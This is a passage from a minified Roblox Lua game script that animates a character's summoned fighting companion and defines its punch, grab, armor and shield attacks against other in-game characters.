yellow"),RootPart.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0)),0.5,0.5,0.5,0.6,0.6,0.6,0.06)CFuncs.Sound.Create("0",HitboxR,1,0.9)CFuncs.Sound.Create("0",HitboxR,1,0.8)for T=0,1,0.08 do swait()Effects.Block.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,4,4,4,0.3,1)Effects.Break.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,0.5,0.5,0.5)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-5),0.3)PlayAnimationFromTable({CFrame.new(-3.57627869E-7,-0.116980031,-2.22140098,0.342020035,-6.11579551E-8,0.939692736,-0.604023039,0.766044259,0.219846413,-0.71984607,-0.642787933,0.262002468)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.13248825E-6,1.49999046,8.94069672E-7,0.422608167,-0.383014679,-0.82140249,-1.36196613E-5,0.906310022,-0.422613323,0.906312764,0.17861104,0.383008778)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.72490048,1.25688744,-0.021425128,-0.678134382,-0.731868863,0.0670941696,0.667953849,-0.575675249,0.47163111,-0.306547582,0.364645123,0.879239857)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.70565486,0.469353855,0.162862837,0.82686162,0.55728358,0.0757693052,-0.414878726,0.513436973,0.751176,0.379712611,-0.652546048,0.655748963)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.757160306,-1.48393714,-0.193787217,0.601814985,0.305624545,-0.737842917,-2.98023224E-8,0.923879623,0.382683486,0.798635662,-0.230304718,0.556004763)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.908789515,-1.60188651,-0.0663503706,0.696367741,0.548584938,-0.462741733,-0.173660636,0.7544052,0.633021533,0.696362019,-0.360454619,0.620610356)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.6,false)end;pk=false;dS=false end;function CastleCrusherFist()dS=true;pk=true;local pM=CFuncs.Sound.Create("0",Torso,1,1)Instance.new("DistortionSoundEffect",pM).Level=0.8;for T=0,1,0.1 do Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0)swait()Effects.Block.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,4,4,4,0.3,1)Effects.Break.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,0.5,0.5,0.5)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-2),0.5)PlayAnimationFromTable({CFrame.new(-5.99771738E-7,-0.00717129931,0.169464022,0.422617912,-2.2671E-7,-0.906308055,-0.309975952,0.939692557,-0.144544229,0.851650834,0.342020661,0.397130787)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.0102166235,1.52751005,-0.239579424,0.456926107,-0.171424359,0.872835577,-0.167732254,0.94705075,0.273807496,-0.87355268,-0.271512181,0.403976858)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.944673777,0.474064022,-0.539126158,0.229199454,0.762564063,0.604949772,0.809601307,0.195682317,-0.553402781,-0.540382624,0.616607308,-0.572522938)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.61232829,0.309644789,-0.24482432,0.455398798,0.536860108,-0.710207343,-0.887026072,0.205374956,-0.413530886,-0.076149486,0.818293095,0.569735885)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.08113468,-1.48232126,0.656104684,0.81421864,-0.517612338,0.262917578,0.175395042,0.651024699,0.738514543,-0.553430021,-0.555197835,0.620862961)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.427128136,-1.50760674,-0.0473105907,0.804508269,-0.373179317,0.462065101,-0.173640698,0.596196175,0.783836842,-0.567992628,-0.71083647,0.414845526)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.2,false)end;Effects.Wave.Create(BrickColor.new("Cool yellow"),RootPart.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0)),0.5,0.5,0.5,0.6,0.6,0.6,0.06)Character.HumanoidRootPart.Velocity=Character.HumanoidRootPart.CFrame.lookVector*140;for T=0,1,0.08 do Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)swait()MagnitudeDamage(HitboxR,5,50,80,100,"Normal","610359515",1)Effects.Block.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,4,4,4,0.3,1)Effects.Break.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,0.5,0.5,0.5)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-5),1)PlayAnimationFromTable({CFrame.new(-3.57627869E-7,-0.116980031,-2.22140098,0.342020035,-6.11579551E-8,0.939692736,-0.604023039,0.766044259,0.219846413,-0.71984607,-0.642787933,0.262002468)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.13248825E-6,1.49999046,8.94069672E-7,0.422608167,-0.383014679,-0.82140249,-1.36196613E-5,0.906310022,-0.422613323,0.906312764,0.17861104,0.383008778)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.72490048,1.25688744,-0.021425128,-0.678134382,-0.731868863,0.0670941696,0.667953849,-0.575675249,0.47163111,-0.306547582,0.364645123,0.879239857)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.70565486,0.469353855,0.162862837,0.82686162,0.55728358,0.0757693052,-0.414878726,0.513436973,0.751176,0.379712611,-0.652546048,0.655748963)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.757160306,-1.48393714,-0.193787217,0.601814985,0.305624545,-0.737842917,-2.98023224E-8,0.923879623,0.382683486,0.798635662,-0.230304718,0.556004763)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.908789515,-1.60188651,-0.0663503706,0.696367741,0.548584938,-0.462741733,-0.173660636,0.7544052,0.633021533,0.696362019,-0.360454619,0.620610356)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.6,false)end;pk=false;dS=false end;function weld5(eQ,eR,dH,dG)local weeld=Instance.new("Weld",eQ)weeld.Part0=eQ;weeld.Part1=eR;weeld.C0=dH;weeld.C1=dG;return weeld end;game["Run Service"].Stepped:connect(function()for T,v in pairs(game:GetService("Workspace"):GetChildren())do if v.Name=="Effect"then v:Destroy()end end end)local Grab=false;function GRABEMBOIGRABEM()Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0)dS=true;gp=nil;con1=HitboxR.Touched:connect(function(hit)local ht=hit.Parent;local hum1=ht:FindFirstChild("Humanoid")if Grab==false then if hum1~=nil and hit.Parent~=Character then hum1.PlatformStand=true;gp=ht;Grab=true;local asd=weld5(RightArm,ht:FindFirstChild("Torso"),CFrame.new(0,-1.5,0),CFrame.new(0,0,0))asd.Parent=RightArm;asd.Name="asd"asd.C0=asd.C0*CFrame.Angles(math.rad(-90),0,0)elseif hum1==nil then con1:disconnect()wait()return end end end)for T=0,1,0.2 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-2),0.3)PlayAnimationFromTable({CFrame.new(-1.08022243E-4,-0.233785003,-0.0873367637,0.499999821,-1.78813863E-7,-0.866025507,0.150383934,0.984807789,0.0868239477,0.852868676,-0.173648283,0.492403716)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.2665987E-7,1.49999368,-1.02072954E-6,0.573575675,0.0713936985,0.816035628,-5.01982868E-7,0.996194899,-0.0871551931,-0.819152594,0.049989678,0.571393132)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.47017705,0.884583473,0.0280318335,0.886720777,-0.205462068,0.414139926,0.236241817,-0.568640172,-0.787933052,0.397386849,0.796513736,-0.455686152)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.76647317,0.409804255,-0.03838256,0.444113791,0.836516619,-0.320940912,-0.836516619,0.258818626,-0.482962757,-0.320940822,0.482962757,0.814704895)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.838749349,-1.98392951,0.15807499,0.830397308,-0.277826965,0.48296237,0.167731524,0.951251447,0.258818328,-0.53132534,-0.133914024,0.836516857)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.811016142,-1.63281643,-0.179561377,0.642214835,0.00870995224,0.76647532,-0.0151349902,0.999884725,0.00131897628,-0.766375303,-0.0124476701,0.642272472)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end;for T=0,1,0.1 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-6),0.3)PlayAnimationFromTable({CFrame.new(0.159273595,-0.292363107,-0.115490548,0.0844330043,-0.144068986,0.985959053,-0.357129037,0.919379771,0.164923266,-0.930231094,-0.366039604,0.0261747837)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(4.81307507E-6,1.49999106,-3.65450978E-6,0.171444774,-0.100317284,-0.980072975,-0.0616287738,0.991762042,-0.11229457,0.983264267,0.0796530023,0.163850009)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.73932612,1.06159639,0.141945362,-0.153680667,-0.913934886,0.375639945,0.659919798,-0.377877831,-0.649395287,0.735450923,0.148092732,0.661196351)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.68730593,0.429691374,-0.418232322,0.633863091,0.519853055,-0.57268703,-0.772902489,0.453472316,-0.443829596,0.028971523,0.723958433,0.689235032)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.51381135,-1.74729896,0.0663300753,0.422899842,0.615153313,-0.665388703,-0.0435856879,0.747240186,0.66312325,0.905127704,-0.251433372,0.342819571)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.991570175,-1.5009346,-0.1830419,0.415304065,0.586875141,-0.695054054,-0.166150108,0.800146103,0.576333642,0.894380629,-0.123870395,0.429813296)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end;if Grab==true then for T=1,5 do for T=0,1,0.35 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,13,-6),0.3)PlayAnimationFromTable({CFrame.new(-0.0701122433,-0.336599797,-0.467321932,0.694850504,-0.140219957,-0.70535183,0.704946458,0.326802045,0.629484713,0.142244101,-0.934633017,0.325926095)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-3.05473804E-6,1.49998987,8.94069672E-7,0.707109332,0.122785509,0.696362555,1.49011612E-6,0.984807491,-0.173649877,-0.707104206,0.122789055,0.696367502)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.23286271,0.549701929,-0.640782475,0.740093768,0.612683415,0.277277708,0.0735714883,0.336068332,-0.938959956,-0.668469429,0.715318501,0.203645304)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.63418663,0.202915072,-0.0286649466,0.865367413,0.490698665,0.101754986,-0.445756227,0.846484005,-0.291146517,-0.228999093,0.206590697,0.951251805)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.702593744,-1.71321297,0.369734973,0.965928972,-0.148447216,0.212003857,1.10641122E-6,0.819153726,0.573574424,-0.258809477,-0.554031372,0.791244447)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.577289343,-1.34221494,-0.247686923,0.766049445,-0.219846189,0.604016602,1.58697367E-6,0.939692199,0.342021465,-0.642781496,-0.262004316,0.719851196)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.4,false)end;for T=0,1,0.3 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1,-6),0.3)PlayAnimationFromTable({CFrame.new(-0.170705646,-0.774955988,-0.472947001,0.827218175,0.130671635,0.546475112,-0.561879098,0.194839522,0.803946257,-0.00142200035,-0.972091854,0.234596446)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.76951289E-7,1.49999058,2.2649765E-6,0.80180192,-0.161171481,-0.575445414,0.176131338,0.983905077,-0.0301590711,0.571044207,-0.0771723837,0.817283988)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.59014189,0.537312388,-0.263691217,0.798337102,-0.524361372,0.296147287,0.455999702,0.205153137,-0.866011977,0.393347621,0.826412499,0.402889967)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.41546631,0.414666086,0.337005794,0.716736436,0.581529975,0.384852976,-0.56681174,0.807305396,-0.164264664,-0.406218559,-0.100404784,0.908243656)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.793360233,-1.59947133,0.0620805621,0.876221955,-0.148448378,-0.458477885,0.368687749,0.81915307,0.439383447,0.310339272,-0.55403173,0.772486985)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.535338402,-1.81867206,0.817932665,0.829598367,0.11430642,-0.546535134,0.32139504,0.702652454,0.634810925,0.456587166,-0.702291727,0.546181798)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.7,false)end;local hit,pos=rayCast(HitboxR.Position,CFrame.new(RootPart.Position,RootPart.Position-Vector3.new(0,1,0)).lookVector,100,Character)if hit~=nil then MagnitudeDamage(HitboxR,5,10,30,0,"Normal","610359515",1.3)Effects.Block.Create(BrickColor.new("Cool yellow"),CFrame.new(pos),1,1,1,0.7,0.7,0.7,0.09,1)Effects.Wave.Create(BrickColor.new("Cool yellow"),CFrame.new(pos),1,1,1,0.7,0.7,0.7,0.09)Effects.Sphere.Create(BrickColor.new("Cool yellow"),CFrame.new(pos),3,3,3,5,5,5,0.09)end end end;for T,v in pairs(RightArm:GetChildren())do if v.Name=="asd"and v:IsA("Weld")then v:Remove()end end;Grab=false;con1:disconnect()dS=false end;local pN=false;function Armor(fj)dS=true;if pN==false and fj=="On"then pN=true;Disappear()swait(10)ReappearArmorOnly()Character.Humanoid.MaxHealth=500;Character.Humanoid.Health=500;HHandleWeld.Part0=Character.Head;THandleWeld.Part0=Character.Torso;AHandleRWeld.Part0=Character["Right Arm"]AHandleLWeld.Part0=Character["Left Arm"]LHandleRWeld.Part0=Character["Right Leg"]LHandleLWeld.Part0=Character["Left Leg"]for T,v in pairs(AdvancingFortress:GetChildren())do if v:IsA("BasePart")then v.Transparency=1 end end;for T,v in pairs(Character:GetChildren())do if v:IsA("Accessory")then v.Handle.Transparency=1 end end elseif pN==true and fj=="Off"then pN=false;DisappearArmorOnly()for T,v in pairs(Character:GetChildren())do if v:IsA("Accessory")then v.Handle.Transparency=1 end end;swait(10)Reappear()Character.Humanoid.MaxHealth=100;Character.Humanoid.Health=100;HHandleWeld.Part0=Head;THandleWeld.Part0=Torso;AHandleRWeld.Part0=RightArm;AHandleLWeld.Part0=LeftArm;LHandleRWeld.Part0=RightLeg;LHandleLWeld.Part0=LeftLeg;for T,v in pairs(AdvancingFortress:GetChildren())do if v:IsA("BasePart")then v.Transparency=1 end end end;dS=false end;local pO=false;local pP=false;function HoloHexShield()Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0)dS=true;Shield.Parent=m;Shield.CanCollide=true;if pO==true then while pO==true do swait()Effects.Elec.Create(Shield.CFrame,6,6,6)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1.3,-4),0.3)PlayAnimationFromTable({CFrame.new(-1.35600567E-6,-0.00759640103,-0.0868249983,0.499999046,-1.78813579E-7,-0.866026044,0.150384009,0.984807789,0.0868238211,0.852869093,-0.173648283,0.492402941)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.49011612E-7,1.4999963,-2.08616257E-7,0.499999046,0.0754797831,0.862731695,-1.78813579E-7,0.996196151,-0.0871563852,-0.866026044,0.0435779616,0.498097092)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.50238657,0.320674658,0.252193451,0.855209947,-0.376432747,-0.356249839,0.469514668,0.853786647,0.224954769,0.219480619,-0.35964793,0.906907678)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.944740474,0.689363539,-0.718644142,0.836517215,-0.545084715,0.0558781698,-0.258834839,-0.482974619,-0.836504936,0.482953727,0.685287297,-0.545103252)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.61525929,-1.85127568,0.120779425,0.928754449,-0.162676111,0.333104134,0.0394990072,0.93689239,0.347407103,-0.368597984,-0.309496939,0.876555264)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.849455297,-1.60697818,-0.270956695,0.696359396,-0.136922374,0.704511464,-0.122786656,0.944430828,0.30491665,-0.707112312,-0.298836082,0.640850842)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end end;Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)Shield.CanCollide=false;Character.HumanoidRootPart.Velocity=Character.HumanoidRootPart.CFrame.lookVector*160;Effects.Wave.Create(BrickColor.new("Cool yellow"),RootPart.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0)),0.5,0.5,0.5,0.6,0.6,0.6,0.06)for T=0,1,0.05 do swait()MagnitudeDamage(Shield,5,10,15,20,"Normal","610359515",1.3)Effects.Elec.Create(Shield.CFrame,6,6,6)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1.3,-3),1)PlayAnimationFromTable({CFrame.new(8.64267349E-7,-0.183445007,-0.748600185,0.499999046,-1.19209105E-7,-0.866026044,0.496732056,0.819152176,0.28678751,0.709407032,-0.573576331,0.409575343)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-7.15255737E-7,1.50001967,-6.2584877E-7,0.499999046,0.36600244,0.784893453,-1.19209105E-7,0.90631634,-0.42262283,-0.866026044,0.211310923,0.453157306)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.76569033,0.610707581,0.171269983,0.658267856,-0.680293143,-0.322312057,0.725086272,0.457917482,0.514355659,-0.202320263,-0.572288036,0.794703186)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.07552779,1.01543474,-0.975205183,0.645357251,-0.653341353,-0.39580214,-0.64124006,-0.181770697,-0.745500326,0.4151209,0.734918237,-0.536255598)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.630614281,-1.76328135,0.440194428,0.866077662,-0.24334389,0.436684549,-0.0614839792,0.815044224,0.57612747,-0.496114343,-0.525820255,0.69092983)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.857700765,-1.25810766,-0.239681423,0.499215126,-0.257185757,0.827429712,-0.238765404,0.877132356,0.416689515,-0.832931936,-0.405579239,0.376470625)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.5,false)end;Shield.Parent=nil;dS=false end;Mouse.Button1Down:connect(function()if dS==false and ic==1 then ic=2;attackone()elseif dS==false and ic==2 then ic=1;attacktwo()end end)game.Lighting.Outlines=false;function attackone()dS=true;Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)for T=0,1,0.12 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1.3,-4),0.3)PlayAnimationFromTable({CFrame.new(1.51857734E-4,-0.310488015,-0.087417841,0.707106054,5.26835073E-8,-0.707107484,0.122787014,0.984807968,0.122786865,0.696365058,-0.173646957,0.696363688)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.101928703,1.50244772,-0.0383823365,0.76589334,0.0762532279,0.638430059,-0.0196644422,0.995256186,-0.095281601,-0.642666996,0.0604211651,0.763759375)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.01774633,0.557527065,-0.776187301,0.541353703,0.741649806,0.396095604,0.711713314,-0.153383806,-0.685520053,-0.447661191,0.653015316,-0.610876858)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.07208586,0.264054269,-0.716768324,0.529938459,-0.260122895,-0.807156265,-0.752277017,0.295165181,-0.589030504,0.39146477,0.919355154,-0.039265126)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.81415844,-1.89738977,0.144144416,0.866025925,-0.171008825,0.469845951,-1.40815973E-6,0.939692497,0.342020512,-0.499999285,-0.296199232,0.813797772)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.818738878,-1.59999573,-0.397991776,0.642786622,0.0667650178,0.763130188,4.3399632E-7,0.99619472,-0.0871558338,-0.766045213,0.0560229495,0.640340626)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end;MagnitudeDamage(HitboxR,7,10,15,math.random(1,3),"Normal","260430079",1)RootPart.Velocity=RootPart.CFrame.lookVector*40;for T=0,1,0.11 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1.3,-4),0.3)PlayAnimationFromTable({CFrame.new(0.31380862,-0.320521832,0.0252371654,0.249517962,-0.150383011,0.956622124,-0.0458769947,0.984923244,0.166798219,-0.967282891,-0.0855060965,0.238856897)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.101926193,1.50244832,-0.0383800864,0.337979913,0.0762555003,-0.938059092,-0.0828148723,0.995255768,0.051067099,0.937502801,0.0604255944,0.342691481)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.96121001,0.774859428,-0.462411612,0.340120375,-0.92077136,0.191045195,0.466549307,-0.0111669078,-0.884424806,0.816486418,0.389942825,0.42578721)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.36170578,0.526111126,-0.597925961,0.81348151,-0.212761745,-0.541276693,-0.539894938,0.0697831511,-0.838834763,0.216243982,0.974609077,-0.0581016839)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.970680714,-1.68610644,-0.0975568295,0.579166114,-0.127570763,-0.805166125,0.110368893,0.990856647,-0.0776019096,0.807703912,-0.0439208932,0.587950349)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.827146292,-1.8113209,-0.0556658059,0.816036701,0.217413262,-0.535551846,-0.0871567726,0.962250471,0.257832885,0.571391284,-0.163724124,0.804180741)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.45,false)end;dS=false end;function attacktwo()dS=true;Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)for T=0,1,0.12 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1.3,-4),0.3)PlayAnimationFromTable({CFrame.new(-0.0382043272,-0.447743475,-0.209081307,0.653245032,-0.0733856931,0.753581822,-0.271655023,0.906307638,0.323743671,-0.706735075,-0.416198224,0.572105408)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-2.74181366E-6,1.49999321,-3.4570694E-6,0.707105815,-0.183012873,-0.683013678,-8.7171793E-7,0.965925694,-0.258819759,0.707107782,0.183013588,0.683011472)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.65075588,0.743636727,-0.356577665,0.542998552,-0.115416825,0.831764221,0.839699984,0.0834951103,-0.536593378,-0.00751632452,0.989801884,0.142253295)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.08620656,-0.00580590963,-0.864283919,0.656464815,-0.698875248,0.283949524,0.478162557,0.0943745971,-0.873186052,0.583450615,0.708990037,0.396129608)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.856426239,-1.40340364,-0.356423855,0.707105279,-0.122788861,-0.696365654,9.42498446E-7,0.98480767,-0.173648372,0.707108438,0.122787014,0.696362913)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.695387185,-1.90375674,-0.304245114,0.92541647,0.246137589,-0.288133472,-0.173648298,0.951251149,0.254887551,0.336824656,-0.185843274,0.923044682)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.34,false)end;MagnitudeDamage(HitboxL,7,10,15,math.random(1,3),"Normal","260430079",1.1)RootPart.Velocity=RootPart.CFrame.lookVector*40;for T=0,1,0.12 do swait()RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(0,1.3,-4),0.3)PlayAnimationFromTable({CFrame.new(-0.479634404,-0.393727064,-0.220339894,0.248309121,0.219825819,-0.94340837,0.019257009,0.972597659,0.231695861,0.968489468,-0.0756994039,0.237271711)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-4.01586294E-6,1.4999907,-1.59628689E-6,0.237956509,-0.0991817266,0.966198623,0.22414881,0.973527908,0.0447304621,-0.945057809,0.205928385,0.253888786)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.08192515,0.657660127,-1.1749661,0.228772208,0.493058115,0.839379132,0.874719322,0.27430138,-0.399530977,-0.427234828,0.825622678,-0.368534833)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.23054802,1.29996836,-0.754827142,0.94838953,-0.316170156,0.0243683457,-0.269034386,-0.84291333,-0.465958893,0.167862713,0.43535465,-0.88447094)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.839919031,-1.81287205,0.0102108568,0.808574855,-0.267538428,0.524051666,0.171010748,0.95905602,0.22575888,-0.562994003,-0.0929245204,0.821220458)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.846072078,-1.7213496,-0.247524291,0.693717241,0.0689389557,0.716940701,-0.0478171073,0.997620881,-0.0496601462,-0.718658566,1.68083934E-4,0.695363283)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.45,false)end;dS=false end;function findNearestTorso(pos)local pf=game:GetService("Workspace"):children()local torso;local jd=1000;local pg,ph,pi;for x=1,#pf do pi=pf[x]if pi.className=="Model"and pi.Name~=Character.Name then pg=pi:findFirstChild("Torso")ph=pi:findFirstChild("Humanoid")if pg~=nil and ph~=nil and ph.Health>0 and jd>(pg.Position-pos).magnitude then local pj=true;if pj==true then torso=pg;jd=(pg.Position-pos).magnitude end end end end;return torso,jd end;function TrueAim(pQ)local ld,jb=findNearestTorso(Mouse.Hit.p)local pR=HitboxR.CFrame*CFrame.fromEulerAnglesXYZ(1.57,0,0).lookVector;if pQ~=nil then pR=pQ end;table.insert(Effects,{pR,"Shoot",30,HitboxR.Position,10,15,0,3,HitboxR,ld})end;W(R.torso.Handle,Character.AdvancingFortress["FTorso"])W(S.head.Handle,Character.AdvancingFortress["FHead"])W(S.heir.Handle,Character.AdvancingFortress["FHead"])W(S.fwuffyeaws.Handle,Character.AdvancingFortress["FHead"])W(S.bloosh.Handle,Character.AdvancingFortress["FHead"])W(S.cyoot.Handle,Character.AdvancingFortress["FHead"])W(R.rightarm.Handle,Character.AdvancingFortress["Right Arm"])W(R.leftarm.Handle,Character.AdvancingFortress["Left Arm"])W(R.rightleg.Handle,Character.AdvancingFortress["Right Leg"])W(R.leftleg.Handle,Character.AdvancingFortress["Left Leg"])R.rightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.rightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)Character.AdvancingFortress:WaitForChild("FTorso"):FindFirstChild("Attachment").Name="Attachment5"Character.AdvancingFortress:WaitForChild("FHead"):FindFirstChild("Attachment").Name="Attachment6"Character.AdvancingFortress:WaitForChild("Right 